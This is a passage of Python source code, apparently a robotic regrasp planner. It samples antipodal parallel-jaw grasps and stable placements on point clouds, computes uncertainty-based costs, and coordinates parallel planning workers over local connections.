pairs[uniquePointsInPair]\n # --\n binormals = binormals / tile(reshape(binormalsLen, (binormals.shape[0], 1)), (1, 3))\n \n # (Vectorize antipodal check.)\n X = tile(normals, (normals.shape[0], 1))\n Y = repeat(normals, normals.shape[0], axis = 0)\n X = X[uniquePointsInPair]\n Y = Y[uniquePointsInPair]\n isAntipodal = logical_and(\\\n sum(+binormals * X, axis = 1) >= self.cosHalfAngleOfGraspFrictionCone, \\\n sum(-binormals * Y, axis = 1) >= self.cosHalfAngleOfGraspFrictionCone)\n pairs = pairs[isAntipodal]; binormals = binormals[isAntipodal]\n #print(\"Found {} antipodal pairs of points.\".format(len(pairs)))\n \n # Filter pairs which are too wide for the gripper.\n \n fits = sum(power(cloud[pairs[:, 0]] - cloud[pairs[:, 1]], 2), axis = 1) < self.squareHandWidth\n pairs = pairs[fits]\n binormals = binormals[fits] \n #print(\"{} pairs fit in gripper.\".format(len(pairs)))\n \n return pairs, binormals\n \n def GetCostLowerBound(self, cloud, normals, pointCosts, pointPairs, goalPlaceCosts):\n '''Computes a lower bound on the cost acheivable by a regrasp plan.\n \n - Input cloud: nx3 numpy array of points representing the object.\n - Input normals: nx3 numpy array of surface normals at the corresponding points in cloud\n (assumed to be normalized).\n - Input pointCosts: n-element numpy array of costs associated with each point.\n - Input pointPairs: mx2 integer numpy array, where, each row indexes a pair of points in cloud\n that could potentially form an antipodal grasp.\n - Input goalPlaceCosts: k-element list of task-relevant costs for each goal placement.\n - Returns: A (scalar) lower bound on the regrasp plan cost. 
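The bound assumes a best-case direct pick-and-place: two step costs, twice the cheapest grasp cost, and the cheapest goal placement cost, plus the insignificant-cost margin. 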
(The regrasp plan cost is described\n in detail in the Notebook, proposal, paper, etc.)\n '''\n \n if pointPairs.size == 0:\n return float('inf') # no grasps possible\n \n if len(goalPlaceCosts) == 0:\n return float('inf') # no goal placements possible\n \n # there must be at least 2 steps, 2 grasps, and 1 goal\n graspCosts = self.GetGraspCosts(cloud, normals, pointCosts, pointPairs)\n return 2.0 * self.stepCost + 2.0 * min(graspCosts) + min(goalPlaceCosts) + self.insignificantCost\n \n def GetGraspCosts(self, cloud, normals, pointCosts, pointPairs):\n '''Given a pair of contact points for parallel-jaw grasps, find the step cost for each grasp.\n \n - Input cloud: nx3 numpy array of points representing the object.\n - Input normals: nx3 numpy array of surface normals at the corresponding points in cloud\n (assumed to be normalized).\n - Input pointCosts: n-element numpy array of costs associated with each point.\n - Input pointPairs: mx2 integer numpy array, where, each row indexes a pair of points in cloud\n that could potentially form an antipodal grasp.\n - Returns graspCosts: m-element numpy array, which is the estimated negative half log\n probability of grasp success. (Half because the search algorithm will penalize each grasp\n twice, once for the pick and once for the place.)\n '''\n \n # input checking\n if len(pointPairs) == 0:\n return zeros(0)\n \n if cloud.shape[0] != normals.shape[0]:\n raise Exception(\"Cloud with {} points does not match {} normals.\".format(\n cloud.shape[0], normals.shape[0]))\n \n if cloud.shape[0] != pointCosts.shape[0]:\n raise Exception(\"Cloud with {} points does not match {} point costs.\".format(\n cloud.shape[0], pointCosts.shape[0]))\n \n if cloud.shape[1] != 3 or normals.shape[1] != 3:\n raise Exception(\"Cloud or normals not 3D.\")\n \n if max(pointPairs) >= cloud.shape[0]:\n raise Exception(\"cloud has {} points, but pointPairs indices go up to {}.\".format(\n cloud.shape[0], max(pointPairs)))\n \n # uncertainty at contact points\n uncertaintyCost = 0.5 * self.graspCostFactor * sum(pointCosts[pointPairs], axis = 1)\n \n # antipodal cost\n if self.antipodalCostFactor > 0:\n \n binormals = cloud[pointPairs[:, 0], :] - cloud[pointPairs[:, 1], :]\n binormalsLen = norm(binormals, axis = 1)\n binormals /= tile(reshape(binormalsLen, (binormals.shape[0], 1)), (1, 3))\n N0 = normals[pointPairs[:, 0], :]; N1 = normals[pointPairs[:, 1], :]\n \n mu0 = arccos(minimum(sum(+binormals * N0, axis = 1), 1.0))\n mu1 = arccos(minimum(sum(-binormals * N1, axis = 1), 1.0))\n \n # With this cost, the friction cone is the random variable, centered on the given surface\n # normal with half angle uniformly distributed between 0 and pi.\n #cost0 = -log(1.0 - mu0, 1.0)) / pi)\n #cost1 = -log(1.0 - mu1, 1.0)) / pi)\n \n # With this cost, the angle between the normal and binormal is normally distributed (but\n # truncated between 0 and pi), and we can compute the probability it is outside the friction\n # cone using the truncated normal CDF.\n cost0 = -log(self.TruncatedNormalCdf(self.halfAngleOfGraspFrictionCone, mu0, 0.13, 0.00, pi))\n cost1 = -log(self.TruncatedNormalCdf(self.halfAngleOfGraspFrictionCone, mu1, 0.13, 0.00, pi))\n \n antipodalCost = 0.5 * self.antipodalCostFactor * (cost0 + cost1)\n \n else:\n antipodalCost = zeros(len(pointPairs))\n \n return uncertaintyCost + antipodalCost\n \n def GetPlaceCosts(self, pointCosts, triangles):\n '''Given points that contact the horizontal surface for a temporary placement, determines the\n cost of the placement.\n \n - 
Input pointCosts: n-element numpy array with costs for each point in the point nx3 point cloud.\n - Input triangles: kx3 integer numpy array where each row indexes a triple in point costs,\n corresponding to the contact points of a placement. (Output by SamplePlacements.)\n - Returns placeCosts: k-element numpy array with the cost for each triple of contact points,\n i.e., for each temporary placement to be evaluated.\n '''\n \n if triangles.shape[1] != 3:\n raise Exception(\"Triangles must be 3D.\")\n \n if max(triangles) >= pointCosts.shape[0]:\n raise Exception(\"pointCosts has {} elements, but triangle indices go up to {}.\".format(\n pointCosts.shape[0], max(triangles)))\n \n return 0.5 * self.placeCostFactor * sum(pointCosts[triangles], axis = 1)\n\n def GetPointCosts(self, segmClouds, compClouds, segmCorrectProbs, compCorrectProbs):\n '''Associates a cost with each point in the completed point clouds.\n \n - Input segmClouds: Result of object instance segmentation, i.e., a list of point clouds\n (m_i x 3 numpy arrays), one for each object.\n - Input compClouds: Shape completions for each object, i.e., list of n_i x 3 numpy arrays.\n - Input segmCorrectProbs: List of m_i, per-point segmentation correctness probabilities.\n - Input compCorrectProbs: List of n_i, per-point completion correctness probabilities.\n - Returns pointCosts: n_i non-negative costs for each point of each object.\n '''\n \n # input checking\n if len(compClouds) != len(segmClouds) or len(segmCorrectProbs) != len(segmClouds) or \\\n len(compCorrectProbs) != len(segmClouds):\n raise Exception(\"Inconsistent number of objects.\")\n \n pointCosts = []\n for i in xrange(len(segmClouds)):\n \n # associate segmentation probabilities with completion probabilities\n \n # (method 1: use average segmentation correctness probability)\n #associatedSegmCorrectProbs = ones(compCorrectProbs[i].size) * mean(segmCorrectProbs[i])\n \n # (method 2: use nearest segmentation correctness probability)\n tree = cKDTree(segmClouds[i])\n _, idx = tree.query(compClouds[i])\n associatedSegmCorrectProbs = segmCorrectProbs[i][idx]\n \n # convert correctness probabilities to costs\n pointCosts.append(-self.segmUncertCostFactor * log(associatedSegmCorrectProbs) - \\\n self.compUncertCostFactor * log(compCorrectProbs[i]))\n \n # debugging\n #self.env.PlotCloud(concatenate(compClouds), matplotlib.cm.viridis(exp(-concatenate(pointCosts))))\n #raw_input(\"Contact point probabilities.\")\n \n return pointCosts\n \n def Plan(self, segmClouds, segmCorrectProbs, compClouds, compCorrectProbs, normals, goalPoses,\n goalCosts, targObjs, obstaclesAtStart, obstaclesAtGoal):\n '''Runs PlanWorker for each object in parellel and returns the lowest-cost regrasp plan found.\n \n - Input segmClouds: Segmentation for each object.\n - Input segmCorrectProbs: Per-point segmentation correctness probability (for each object).\n - Input compClouds: Completed point cloud for each object.\n - Input compCorrectProbs: Per-point segmentation correctness probabiltiy (for each object).\n - Input normals: Surface normals for each completed point cloud.\n - Input goalPoses: A list of goal placements (transform of the object from its current pose).\n - Input goalCosts: The task cost associated with each goal pose.\n - Input targObjs: The index of the object associated with each goal pose.\n - Input obstaclesAtStart: Point cloud of obstacles at object's current location (for each goal\n pose). 
Assumed same for identical target objects.\n - Input obstaclesAtGoal: Point cloud of obstacles at object's goal location (for each goal\n pose). Assumed same for identical target objects.\n - Returns pickPlaces: Gripper poses for each pick/place in the regrasp plan.\n - Returns goalIdx: The index (in goalPoses, goalCosts, or targObjs) of the goal placement.\n - Returns targObjIdx: The index (in compClouds) of the object selected for manipulation.\n '''\n \n # input checking\n nObjects = len(segmCorrectProbs); nGoals = len(goalPoses)\n if len(segmCorrectProbs) != nObjects or len(compClouds) != nObjects or \\\n len(compCorrectProbs) != nObjects or len(normals) != nObjects:\n raise Exception(\"Inconsistent number of objects.\")\n if len(goalCosts) != nGoals or len(targObjs) != nGoals or len(obstaclesAtStart) != nGoals or \\\n len(obstaclesAtGoal) != nGoals:\n raise Exception(\"Inconsistent number of goals.\")\n if isnan(goalCosts).any(): raise Exception(\"Goal costs must be non-NaN.\")\n if min(goalCosts) < 0: raise Exception(\"Goal costs must be non-negative.\")\n \n # compute \"point costs\" and incorporate task cost factor\n pointCosts = self.GetPointCosts(segmClouds, compClouds, segmCorrectProbs, compCorrectProbs)\n for i in xrange(len(goalCosts)):\n goalCosts[i] *= self.taskCostFactor\n \n # get a list of objects to plan for\n uniqueTargObjs = unique(targObjs)\n \n # create a worker for each object\n connections = []; bestPossibleCosts = zeros(len(uniqueTargObjs))\n for i, targObj in enumerate(uniqueTargObjs):\n \n # pre-sample grasps if this hasn't been done yet\n hasPreSampled = False\n for j, preSampledCloud in enumerate(self.preSampledClouds):\n if compClouds[targObj] is preSampledCloud:\n hasPreSampled = True\n break\n if not hasPreSampled:\n self.PreSampleGraspsOnObjects(\n [compClouds[targObj]], [normals[targObj]], [pointCosts[targObj]], 0)\n j = 0\n \n # fetch pre-sampled grasps\n grasps = self.preSampledGrasps[j]\n graspContacts = self.preSampledPairs[j]\n graspBinormals = self.preSampledBinormals[j]\n graspCosts = self.preSampledGraspCosts[j]\n \n # get all of the goals and costs for this object\n finalPoses = [goalPoses[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n finalCosts = [goalCosts[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n startObstacles = [obstaclesAtStart[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n finalObstacles = [obstaclesAtGoal[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n finalCosts = array(finalCosts)\n \n # find the best possible cost for this object \n bestPossibleCosts[i] = self.GetCostLowerBound(compClouds[targObj], normals[targObj],\n pointCosts[targObj], graspContacts, finalCosts)\n \n # send relevant data to each worker\n message = [\"regrasp\", compClouds[targObj], normals[targObj], pointCosts[targObj], finalPoses,\n finalCosts, startObstacles[0], finalObstacles[0], grasps, graspCosts, graspContacts,\n graspBinormals, bestPossibleCosts[i]]\n try:\n print(\"Starting regrasp planning worker {} with goal costs {}.\".format(i, finalCosts))\n connection = Client(('localhost', 7000 + i))\n except:\n for connection in connections: connection.close()\n raise Exception(\"Unable to connect to worker {}.\".format(i))\n connection.send(message)\n connections.append(connection)\n \n # determine when to cancel workers\n print(\"Best possible plan cost is {}.\".format(min(bestPossibleCosts) - self.insignificantCost))\n \n # wait for result\n pickPlaces = []; goalIdxs = []; costs = []; workerIdxs 
= []\n done = zeros(len(connections), dtype = 'bool')\n i = -1\n \n while not done.all():\n \n # check the next connection\n i = 0 if i + 1 == len(connections) else i + 1 \n \n # ignore connections that are done\n if done[i]: continue\n \n # if there is a result waiting, receive it\n if connections[i].poll(0.1): \n message = connections[i].recv()\n connections[i].close()\n purpose = message[0]\n data = message[1:]\n if purpose == \"regrasp\":\n pickPlaces.append(data[0])\n goalIdxs.append(data[1])\n costs.append(data[2])\n workerIdxs.append(i)\n done[i] = True\n # the lower bound for this worker is no longer achievable\n bestPossibleCosts[i] = data[2] + self.insignificantCost\n print(\"Worker {} completed with cost {}.\".format(i, costs[-1]))\n else:\n print(\"Warning: message had purpose {}\".format(message[0]))\n continue\n \n # send cancel if there is a solution and the best cost is acheived\n if len(costs) > 0 and min(costs) <= min(bestPossibleCosts):\n try: connections[i].send([\"regrasp-cancel\", min(costs)])\n except: print(\"Warning: failed to send cancel to worker {}.\".format(i))\n \n # save data for continuation\n self.contTargObjs = targObjs\n self.contUniqueTargObjs = uniqueTargObjs\n \n # return best result\n bestIdx = argmin(costs)\n print(\"Worker {} had best cost {} with object {}.\".format( \\\n workerIdxs[bestIdx], costs[bestIdx], uniqueTargObjs[workerIdxs[bestIdx]]))\n \n targObjIdx = uniqueTargObjs[workerIdxs[bestIdx]]\n goalIdx = where(targObjIdx == targObjs)[0][goalIdxs[bestIdx]]\n\n return pickPlaces[bestIdx], goalIdx, targObjIdx\n \n def PlanWorker(self, cloud, normals, pointCosts, goalPlaces, goalCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal, graspsNew, graspCostsNew, graspContacts, graspBinormals, bestPossibleCost,\n connection):\n '''Searches for a minimum-cost regrasp plan for the given target object.\n \n - Input cloud: Point cloud (nx3 numpy array) representing the object.\n - Input normals: Surface normals (nx3 numpy array, assumed normalized) for the object.\n - Input pointCosts: n-element array of contact costs associated with each point.\n - Input goalPlaces: List of m placement goals, 4x4 transforms of object from it's current pose.\n - Input goalCosts: Costs associated with each placement goal (m, non-negative elements).\n - Input obstacleCloudAtStart: Point cloud representing obstacles at the object's initial location.\n - Input obstacleCloudAtGoal: Point cloud representing obstacles at the object's goal location.\n - Input graspsNew: List of k initially sampled grasps (4x4 transforms). (More are sampled as\n this function executes.)\n - Input graspCostsNew: Costs for each of the k grasps.\n - Input graspContacts: Pairs of indices into cloud for contact points for each of the k grasps.\n - Input graspBinormals: Closing direction for each of the k grasps.\n - Input bestPossibleCost: A lower bound on the cost that can be achieved by this \n - Input connection: An open Python Connection, allowing sending messages to and receiving\n messages from the parent process. (PlanWorker is invoked when a message from the parent\n process is received. The parent process waits in Plan for PlanWorker to finish.)\n - Returns pickPlaces: List of gripper poses (4x4 homogeneous transforms), relative to the world\n frame, for each grasp and place. The list is of even length. Returns None if no plan is found.\n - Returns goalIdx: Index into goalPlaces that was ultimatly used for placing the object. 
Returns\n None if no regrasp plan is found.\n - Returns cost: The cost of the regrasp plan. Inf if no plan is found.\n '''\n \n # Input checking\n \n if cloud.shape[0] != normals.shape[0]:\n raise Exception(\"Cloud and normals must have the same number of points.\")\n \n if cloud.shape[1] != 3 or normals.shape[1] != 3:\n raise Exception(\"Cloud and normals must be 3D.\")\n \n if pointCosts.size != cloud.shape[0]:\n raise Exception(\"Must have the same number of point costs as points.\")\n \n if isnan(pointCosts).any():\n raise Exception(\"Point costs must not be NaN.\")\n \n if len(pointCosts) > 0 and min(pointCosts) < 0:\n raise Exception(\"Point costs must be non-negative.\")\n \n if len(goalPlaces) != len(goalCosts):\n raise Exception(\"Mismatch in size of goalPlaces and goalCosts.\")\n \n if isnan(goalCosts).any():\n raise Exception(\"Goal costs must not be NaN.\")\n \n if len(goalCosts) > 0 and min(goalCosts) < 0:\n raise Exception(\"Goal costs must be non-negative.\")\n \n if obstacleCloudAtStart.shape[1] != 3 or obstacleCloudAtGoal.shape[1] != 3:\n raise Exception(\"Obstacle clouds must be 3D.\")\n \n if len(graspsNew) != len(graspCostsNew):\n raise Exception(\"Mismatch in size of graspsNew and graspCostsNew.\")\n \n if isnan(graspCostsNew).any():\n raise Exception(\"Grasp costs must not be NaN.\")\n \n if min(graspCostsNew) < 0:\n raise Exception(\"Grasp costs must be non-negative.\")\n \n if graspContacts.shape[0] != graspBinormals.shape[0]:\n raise Exception(\"Mismatch in size between graspContacts and graspBinormals.\")\n \n if graspContacts.shape[1] != 2:\n raise Exception(\"graspContacts must be 2D.\")\n \n if graspBinormals.shape[1] != 3:\n raise Exception(\"graspBinormals must be 3D.\")\n \n # Initialize regrasp planning graph and other variables.\n \n grasps = []\n graspCosts = zeros(0)\n tempPlaces = []\n originalGoalPlaces = goalPlaces\n goalPlaces = []\n placeCosts = zeros(0)\n graspPlaceTable = zeros((0, 1), dtype = \"int32\", order = \"C\")\n \n # Initialize place sampler.\n \n supportingTriangles, triangleNormals, cloudCenter = self.GetSupportSurfaces(cloud)\n \n if len(supportingTriangles) == 0:\n print(\"No supporting faces found! No regrasp plan found.\")\n self.SaveContinuationData([], cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n # Check for early exit.\n \n if len(graspContacts) == 0:\n print(\"No antipodal contacts found! 
No regrasp plan found.\")\n self.SaveContinuationData([], cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n # Search for plans.\n \n plan = []; cost = float('inf')\n nReachableStart = 1; nReachableGoal = 1; notFirstLoop = False \n \n for iteration in xrange(self.maxIterations):\n \n if cost <= bestPossibleCost: break\n \n if connection.poll():\n message = connection.recv()\n if message[0] == \"regrasp-cancel\":\n print(\"Received cancel.\")\n self.SaveContinuationData([], cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, \n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n #print(\"Sampling grasps and places.\")\n if notFirstLoop:\n graspsNew, pairsNew = self.SampleGrasps(cloud, normals, graspContacts, graspBinormals)\n graspCostsNew = self.GetGraspCosts(cloud, normals, pointCosts, pairsNew)\n else:\n notFirstLoop = True\n \n if nReachableStart > 0 and nReachableGoal > 0:\n tempPlacesNew, tempPlacesNewTriangles = self.SamplePlaces(cloud, supportingTriangles,\n triangleNormals, cloudCenter)\n tempPlaceCostsNew = self.GetPlaceCosts(pointCosts, tempPlacesNewTriangles)\n else:\n tempPlacesNew = []\n tempPlaceCostsNew = zeros(0)\n \n goalPlacesNew = originalGoalPlaces[len(goalPlaces) : len(goalPlaces) + \\\n self.nGoalPlaceSamples] if nReachableStart > 0 else []\n goalPlaceCostsNew = goalCosts[len(goalPlaces) : len(goalPlaces) + self.nGoalPlaceSamples] \\\n if nReachableStart > 0 else zeros(0)\n \n #print(\"Updating grasp-place table.\")\n graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, nReachableTemp, nReachableGoal = self.UpdateGraspPlaceTable(\n graspPlaceTable, grasps, graspsNew, graspCosts, graspCostsNew, tempPlaces, tempPlacesNew,\n goalPlaces, goalPlacesNew, placeCosts, tempPlaceCostsNew, goalPlaceCostsNew,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n if nReachableStart == 0 or nReachableGoal == 0: continue\n \n #print(\"Searching grasp-place graph.\")\n plan, cost = self.SearchGraspPlaceGraph(graspPlaceTable, placeTypes, graspCosts, placeCosts)\n print(\"Iteration: {}. Regrasp plan: {}. 
Cost: {}.\".format(iteration, plan, cost))\n \n # Return result\n \n pickPlaces, goalIdx = self.PlanToTrajectory(plan, grasps, tempPlaces, goalPlaces)\n \n self.SaveContinuationData(plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces, goalCosts,\n graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal) \n \n return pickPlaces, goalIdx, cost\n \n def PlanToTrajectory(self, plan, grasps, tempPlaces, goalPlaces):\n '''Converts a plan into a sequence of gripper poses.\n \n - Input plan: List of indices, where the 1st index is into grasps and the 2nd index is into \n [start, tempPlaces, goalPlaces].\n - Input grasps: List of homogeneous transforms representing antipodal grasps on the object in\n the base frame at the object's starting configuration.\n - Input tempPlaces: List of homogeneous transforms representing the object at a temporary place.\n - Input goalPlaces: List of homogeneous transforms representing the object's goal placements.\n - Returns pickPlaces: List of transforms representing the gripper in the base frame at\n alternating grasp and ungrasp (i.e. place) configurations (starting with grasping the object\n at its present configuration). \n - Returns goalIdx: Index into goalPlaces for the goal configuration the plan ends with.\n '''\n \n pickPlaces = []\n goalIdx = None\n for item in plan:\n graspIdx = item[0]\n placeIdx = item[1]\n if placeIdx == 0:\n placePose = eye(4)\n elif placeIdx <= len(tempPlaces):\n placePose = tempPlaces[placeIdx - 1]\n else:\n goalIdx = placeIdx - 1 - len(tempPlaces)\n placePose = goalPlaces[goalIdx]\n pickPlaces.append(dot(placePose, grasps[graspIdx]))\n \n return pickPlaces, goalIdx\n \n def PreSampleGraspsOnObjects(self, clouds, normals, pointCosts, nSamples, visualize = False):\n '''Samples grasps on each object to be used next time Plan is called.\n \n - Input clouds: A point cloud for each object to sample grasps on.\n - Input normals: Object surface normals for each cloud (assumed to be normalized).\n - Input pointCosts: Per-point contact costs for each cloud.\n - Input nSamples: Number of grasps to randomly sample.\n - Input visualize: If True, shows the grasps found in the viewer for each object.\n - Returns preGraspSamples: Grasps for each object sampled.\n '''\n \n # input checking\n \n if len(normals) != len(clouds) or len(pointCosts) != len(clouds):\n raise Exception(\"Inconsistent number of objects.\")\n \n # sample grasps for each object \n self.preSampledClouds = clouds; self.preSampledPairs = []; self.preSampledBinormals = []\n self.preSampledGrasps = []; self.preSampledGraspCosts = []\n \n for i in xrange(len(clouds)):\n \n pairs, binormals = self.GetAntipodalPairsOfPoints(clouds[i], normals[i])\n tmpSamples = self.nGraspSamples; self.nGraspSamples = nSamples\n grasps, pairsForGrasps = self.SampleGrasps(clouds[i], normals[i], pairs, binormals)\n self.nGraspSamples = tmpSamples\n graspCosts = self.GetGraspCosts(clouds[i], normals[i], pointCosts[i], pairsForGrasps)\n \n self.preSampledPairs.append(pairs)\n self.preSampledBinormals.append(binormals)\n self.preSampledGrasps.append(grasps)\n self.preSampledGraspCosts.append(graspCosts)\n \n if visualize:\n self.env.PlotDescriptors(hand_descriptor.DescriptorsFromPoses(grasps),\n matplotlib.cm.viridis(exp(-graspCosts)))\n raw_input(\"Grasps for object {}.\".format(i))\n \n return self.preSampledGrasps\n \n def SampleGrasps(self, cloud, normals, 
pairs, binormals):\n '''Samples antipodal grasps. See spatial antipodal grasps in \"A Mathematical Introduction to\n Robotic Manipulation\" by Murray, Li, and Sastry.\n \n - Input cloud: nx3 numpy array of points.\n - Input normals: nx3 numpy array of surface normal directions for each point in cloud, rows\n assumed to be normalized.\n - Input pairs: mx2 integer numpy where each row is a pair of indices into cloud indicating\n antipodal contact points. Computed in GetAntipodalPairsOfPoints.\n - Input binormals: mx3 numpy array of hand closing directions, corresponding to pairs, from\n GetAntipodalPairsOfPoints. Assumed to be normalized.\n - Returns grasps: List of k, 4x4 numpy matrices which are homogeneous transforms indicating\n randomly sampled grasps in the world frame. Grasps (approximately) make contact with antipodal\n pairs and are guaranteed to be collision-free (checked with the full gripper model) with the\n target object. Antipodal pairs, orientation about the binormal, and offset in approach\n direction are sampled uniformly at random.\n - Returns pairs: kx2 integer numpy array where each row is a pair of indices into the point\n cloud, indicating contacts, for each corresponding grasp.\n '''\n \n # Check inputs.\n \n if len(pairs) == 0:\n return [], zeros((0, 2), dtype = \"int32\")\n \n if len(cloud.shape) != 2 or cloud.shape[1] != 3:\n raise Exception(\"Point cloud not 3D.\")\n \n if len(normals.shape) != 2 or normals.shape[1] != 3:\n raise Exception(\"Surface normals not 3D.\")\n \n if normals.shape[0] != cloud.shape[0]:\n raise Exception(\"Cloud has {} points but normals has {}.\".format(\n cloud.shape[0], normals.shape[0]))\n \n if pairs.shape[1] != 2:\n raise Exception(\"Pairs not 2D.\") \n \n if max(pairs) >= cloud.shape[0]:\n raise Exception(\"Cloud has {} points, but indices in pairs go up to {}.\".format(\n cloud.shape[0], max(pairs)))\n \n if len(binormals.shape) != 2 or binormals.shape[1] != 3:\n raise Exception(\"Binormals not 3D.\") \n \n if binormals.shape[0] != pairs.shape[0]:\n raise Exception(\"Binormals has {} elements but pairs has {} elements.\".format(\n binormals.shape[0], pairs.shape[0]))\n \n # Sample hand poses from the remaining pairs of points.\n # The binormal (hand closing direction) is now fixed. Center x, y on the pair of points. \n # This leaves 2 free parameters: the approach direction and approach (z) offset.\n \n theta = uniform(0, 2 * pi, self.nGraspSamples)\n offset = uniform(-self.handDepth / 2.0, self.handDepth / 2.0, self.nGraspSamples)\n idx = randint(0, pairs.shape[0], self.nGraspSamples)\n \n pairs = pairs[idx]\n binormals = binormals[idx]\n \n grasps = []\n for i in xrange(self.nGraspSamples):\n \n approach = self.GetOrthogonalUnitVector(binormals[i])\n center = (cloud[pairs[i][0]] + cloud[pairs[i][1]]) / 2.0\n T0 = hand_descriptor.PoseFromApproachBinormalCenter(approach, binormals[i], center)\n R = openravepy.rotationMatrixFromAxisAngle(binormals[i], theta[i])[0:3, 0:3]\n \n T = eye(4)\n T[0:3, 0:3] = dot(R, T0[0:3, 0:3])\n T[0:3, 3] = center + offset[i] * T[0:3, 2]\n grasps.append(T)\n \n # Filter grasp samples whos actual contacts are not antipodal. This is important because we\n # implicitly assumed the pair along the binormal were contacts. 
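The sampled pose merely centers the hand between the pair, and the random rotation and approach offset can shift which surface points the fingers actually meet. 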
Also, determine which pair of\n # points is truly in contact with the grasp.\n \n keepGrasps = []; contactPairs = []\n for i, grasp in enumerate(grasps):\n \n isAntipodal, pair = self.env.IsAntipodalGrasp(grasp, cloud, normals,\n self.cosHalfAngleOfGraspFrictionCone, self.env.graspContactWidth)\n \n if isAntipodal:\n keepGrasps.append(grasp)\n contactPairs.append(pair)\n \n grasps = keepGrasps\n pairs = array(contactPairs)\n \n # Filter grasp samples that collide with the object.\n collisionFree = logical_not(self.env.CheckHandObjectCollision(grasps, cloud))\n grasps = [grasps[i] for i in xrange(len(grasps)) if collisionFree[i]]\n pairs = pairs[collisionFree]\n \n # Return result\n return grasps, pairs\n \n def SamplePlaces(self, cloud, supportingTriangles, triangleNormals, cloudCenter):\n '''Randomly transforms for the point cloud where the object will rest stably on the supporting\n surface.\n \n - Input cloud: Point cloud of the object -- an nx3 numpy array.\n - Input supportingTriangles: Indices into cloud indicating facets on which the object will rest\n stably -- an mx3 integer numpy array. Each row corresponds to one facet. Can be computed by\n Planner.GetSupportSurfaces.\n - Input triangleNormals: Outward-pointing normals for supportTriangles -- mx3 numpy array with\n normalized rows. Can be comptued by Planner.GetSupportSurfaces.\n - Input cloudCenter: The mean point of the cloud -- 3-element numpy array. Can be computed by\n Planner.GetSupportSurfaces.\n - Returns places: List of k transforms which move the cloud from its current pose to the stable\n placement, relative to the world frame -- list of 4x4 numpy arrays.\n - Returns supportingTriangles: The support facets from supportingTriangles used -- kxn numpy\n integer array.\n '''\n \n # input checking\n if supportingTriangles.shape[0] != triangleNormals.shape[0]:\n raise Exception(\"supportingTriangles and triangleNormals must have same number of elements.\")\n \n if cloud.shape[1] != 3 or supportingTriangles.shape[1] != 3 or triangleNormals.shape[1] != 3 \\\n or cloudCenter.size != 3: raise Exception(\"Inputs must be 3D.\")\n \n if supportingTriangles.shape[0] == 0:\n return [], zeros((0, 3), dtype = \"int\")\n \n # randomly sample rotation of object about gravity and supporting face\n theta = uniform(0, 2 * pi, self.nTempPlaceSamples)\n idx = randint(0, supportingTriangles.shape[0], self.nTempPlaceSamples) \n \n places = []\n for i in xrange(self.nTempPlaceSamples):\n \n # attach a coordinate system to the cloud such that z is -triangleNormal\n bTo = eye(4)\n bTo[0:3, 3] = cloudCenter\n bTo[0:3, 2] = -triangleNormals[idx[i]]\n R = openravepy.matrixFromAxisAngle(bTo[0:3, 2], theta[i])[0:3, 0:3]\n bTo[0:3, 1] = dot(R, self.GetOrthogonalUnitVector(bTo[0:3, 2]))\n bTo[0:3, 0] = cross(bTo[0:3, 1], bTo[0:3, 2])\n \n # check the cloud in its new orientation\n oTb = point_cloud.InverseTransform(bTo)\n cloudRotated = point_cloud.Transform(oTb, cloud)\n \n # determine translation\n bToo = eye(4)\n bToo[0, 3] = self.temporaryPlacePosition[0]\n bToo[1, 3] = self.temporaryPlacePosition[1]\n bToo[2, 3] = self.temporaryPlacePosition[2] - min(cloudRotated[:, 2])\n places.append(dot(bToo, oTb))\n \n # visualization\n '''for i, place in enumerate(places):\n self.env.PlotCloud(point_cloud.Transform(place, cloud))\n raw_input(\"Showing {}th stable placement.\".format(i))'''\n \n return places, supportingTriangles[idx]\n \n def SaveContinuationData(self, plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, 
supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces, goalCosts,\n graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal):\n '''TODO'''\n \n # remove grasps that are part of the current plan \n keepMask = ones(len(grasps), dtype = \"bool\")\n for i, step in enumerate(plan):\n keepMask[step[0]] = False\n graspPlaceTable = graspPlaceTable[keepMask, :]\n grasps = [grasps[i] for i in xrange(len(grasps)) if keepMask[i]]\n graspCosts = graspCosts[keepMask]\n \n # save \n self.contCloud = cloud\n self.contNormals = normals\n self.contGraspContacts = graspContacts\n self.contGraspBinormals = graspBinormals\n self.contPointCosts = pointCosts\n self.contTriangleNormals = triangleNormals\n self.contSupportingTriangles = supportingTriangles\n self.contCloudCenter = cloudCenter\n self.contOriginalGoalPlaces = originalGoalPlaces\n self.contGoalPlaces = goalPlaces\n self.contGoalCosts = goalCosts\n self.contGraspPlaceTable = graspPlaceTable\n self.contGrasps = grasps\n self.contGraspCosts = graspCosts\n self.contTempPlaces = tempPlaces\n self.contPlaceCosts = placeCosts\n self.contObstacleCloudAtStart = obstacleCloudAtStart\n self.contObstacleCloudAtGoal = obstacleCloudAtGoal\n \n def SearchGraspPlaceGraph(self, graspPlaceTable, placeTypes, 